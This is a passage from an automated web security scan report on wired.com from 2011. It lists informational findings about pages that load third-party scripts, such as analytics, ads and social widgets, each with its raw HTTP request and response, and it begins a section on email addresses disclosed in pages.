Last-Modified: Wed, 12 Jan 2011 15:26:28 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:43:40 GMT
Date: Wed, 12 Jan 2011 15:35:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 130344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.171. http://www.wired.com/threatlevel/tag/tsa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/tsa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/tsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:30 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=443
Expires: Wed, 12 Jan 2011 15:43:03 GMT
Date: Wed, 12 Jan 2011 15:35:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.172. http://www.wired.com/threatlevel/tag/twitter/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/twitter/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/twitter/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:54:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=459
Expires: Wed, 12 Jan 2011 15:43:21 GMT
Date: Wed, 12 Jan 2011 15:35:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.173. http://www.wired.com/threatlevel/tag/virginia-tech-shootings/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/virginia-tech-shootings/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/virginia-tech-shootings/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:06:15 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=477
Expires: Wed, 12 Jan 2011 15:43:41 GMT
Date: Wed, 12 Jan 2011 15:35:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 108575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.174. http://www.wired.com/threatlevel/tag/wikileaks/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/tag/wikileaks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/tag/wikileaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:07:17 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:43:45 GMT
Date: Wed, 12 Jan 2011 15:35:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.175. http://www.wired.com/topics/Claude_Cassirer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /topics/Claude_Cassirer

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /topics/Claude_Cassirer HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:51:24 GMT
Date: Wed, 12 Jan 2011 15:41:24 GMT
Content-Length: 32354
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.176. http://www.wired.com/topics/Florida  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /topics/Florida

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /topics/Florida HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:51:26 GMT
Date: Wed, 12 Jan 2011 15:41:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 50393


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.177. http://www.wired.com/topics/Spain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /topics/Spain

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /topics/Spain HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:51:30 GMT
Date: Wed, 12 Jan 2011 15:41:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47583


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.178. http://www.wired.com/topics/United_States  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /topics/United_States

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /topics/United_States HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:51:31 GMT
Date: Wed, 12 Jan 2011 15:41:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 51019


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.179. http://www.wired.com/topics/Western_Europe  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /topics/Western_Europe

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /topics/Western_Europe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:51:31 GMT
Date: Wed, 12 Jan 2011 15:41:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 50201


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.180. http://www.wired.com/topics/WikiLeaks.org  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /topics/WikiLeaks.org

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /topics/WikiLeaks.org HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:51:32 GMT
Date: Wed, 12 Jan 2011 15:41:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 50736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<!-- close shell div -->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.181. http://www.wired.com/underwire/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /underwire/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /underwire/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 05:02:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=337
Expires: Wed, 12 Jan 2011 05:10:05 GMT
Date: Wed, 12 Jan 2011 05:04:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<!-- Underwire Movies and TV Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Magazine Xrail Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.182. http://www.wired.com/video/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=266
Expires: Wed, 12 Jan 2011 05:09:34 GMT
Date: Wed, 12 Jan 2011 05:05:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107714


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
</div>

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
<div class='bc_shareThisContainer'>
<script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;services=facebook%2Cmyspace%2Cdelicious%2Ctechnorati%2Cpropeller%2Cmixx%2Cnewsvine%2Cgoogle_bmarks%2Cyahoo_myweb%2Cwindows_live%2Ctailrank%2Cmagnolia%2Cfurl%2Cblinklist%2Cblogmarks&amp style=default&amp;publisher=0ec71848-688b-4d92-957d-d8ba67ad2647&amp;headerbg=%23e7e7e7&amp;inactivebg=%23f1f1f1&amp;inactivefg=%237e7e7e&amp;linkfg=%23007ca5"></script>
...[SNIP]...
<!-- close shell div -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

6.183. http://www.wired.com/video/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/search/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/search/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=285
Expires: Wed, 12 Jan 2011 05:10:01 GMT
Date: Wed, 12 Jan 2011 05:05:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
</div>

<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
<div class='bc_shareThisContainer'>
<script type="text/javascript" src="http://w.sharethis.com/widget/?tabs=web%2Cemail&amp;charset=utf-8&amp;services=facebook%2Cmyspace%2Cdelicious%2Ctechnorati%2Cpropeller%2Cmixx%2Cnewsvine%2Cgoogle_bmarks%2Cyahoo_myweb%2Cwindows_live%2Ctailrank%2Cmagnolia%2Cfurl%2Cblinklist%2Cblogmarks&amp style=default&amp;publisher=0ec71848-688b-4d92-957d-d8ba67ad2647&amp;headerbg=%23e7e7e7&amp;inactivebg=%23f1f1f1&amp;inactivefg=%237e7e7e&amp;linkfg=%23007ca5"></script>
...[SNIP]...
<!-- close shell div -->

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

6.184. http://www.wired.com/wiredscience/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /wiredscience/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wiredscience/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:27:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=305
Expires: Wed, 12 Jan 2011 05:10:25 GMT
Date: Wed, 12 Jan 2011 05:05:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<!-- WiredScience Xrail Brightcove Player --><script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 128 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.wired.com/about/faq/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /about/faq/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/faq/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:34 GMT
Date: Wed, 12 Jan 2011 15:40:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
